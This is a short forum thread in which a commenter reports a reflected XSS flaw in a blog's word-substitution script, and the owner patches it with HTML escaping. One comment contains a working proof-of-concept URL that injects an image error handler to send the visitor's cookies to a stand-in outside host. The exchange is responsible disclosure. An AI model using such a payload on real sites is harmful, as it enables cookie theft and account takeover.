a thoughtful web.
Good ideas and conversation. No ads, no tracking.   Login or Take a Tour!
comment by acyclicks
acyclicks  ·  3573 days ago  ·  link  ·    ·  parent  ·  post: Ruin My Website

You've written a blog post titled "Ruin My Website" detailing an XSS vulnerability you've added to your website. It's really funny.

It is easy to create a replacement that sends your cookies off to an attacker's website. Someone could send you a shortened link to a malicious replacement on twitter, or maybe right here. Depending on how your website is laid out, those cookies are likely to give an attacker access to your admin console.



StJohn  ·  3573 days ago  ·  link  ·  

I pushed an update to do some HTML-escaping. I think that should do the trick, although that said I did try to get the site to execute some random JS code injected via the URL and wasn't able to. Better to be safer, though, especially if other people want to crib this for their own sites.

Thanks for the tip! I made sure I credited you in the blog post as well.

---
acyclicks  ·  3573 days ago  ·  link  ·  

That was fast. Thanks for the credit. It is a fun script.

I had the xkcd substitutions extension installed for nearly a year. The car -> cat substitution was the worst. Parsing the word "cat" took quite a bit of extra effort, even in print.

---
StJohn  ·  3573 days ago  ·  link  ·  

I think that's a little bit dramatic. For a start I don't think there's anything people could get their hands on -- as far as I'm aware there are no cookies on my site. The only dynamic content at all is from that wee Twitter iframe.

If you have a proof of concept attack, I'd love to see it -- and to think about a solution. Are you talking about the risk of someone injecting JS code into the website via a link and inducing me to click on it? I could update the JS to escape the URL parameters before performing the replace..

---
acyclicks  ·  3573 days ago  ·  link  ·  

Yeah, I was thinking of someone injecting some JS code into a link, and getting you to click on it. If you have no dynamic content on the domain, then you should be safe. Also I can't imagine anyone would normally bother; I just genuinely found the title+exploit combination funny.

POC:

https://www.fuzzjunket.com/ruin-my-website/?October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27//example.com/%27%20%2B%20document.cookie;%22%20/%3E

Html encoding the string before doing the replacement should fix it if you can be bothered.

Pseudo-edit: Just saw you already pushed a fix. That was fast. The POC did work before the fix.

---
StJohn  ·  3573 days ago  ·  link  ·  

Oooh, thank you! I'm aware inviting the Internet to ruin my site is probably like poking a sleeping dragon, but I try to stay on top of any security risks and I'm always glad to get pointers. I figured any injection attacks couldn't affect anyone but the person viewing the website, but I hadn't considered anyone trying to hook me with their nefarious schemes. The cheek. "Infamy! Infamy! They've all got it in for me!"

---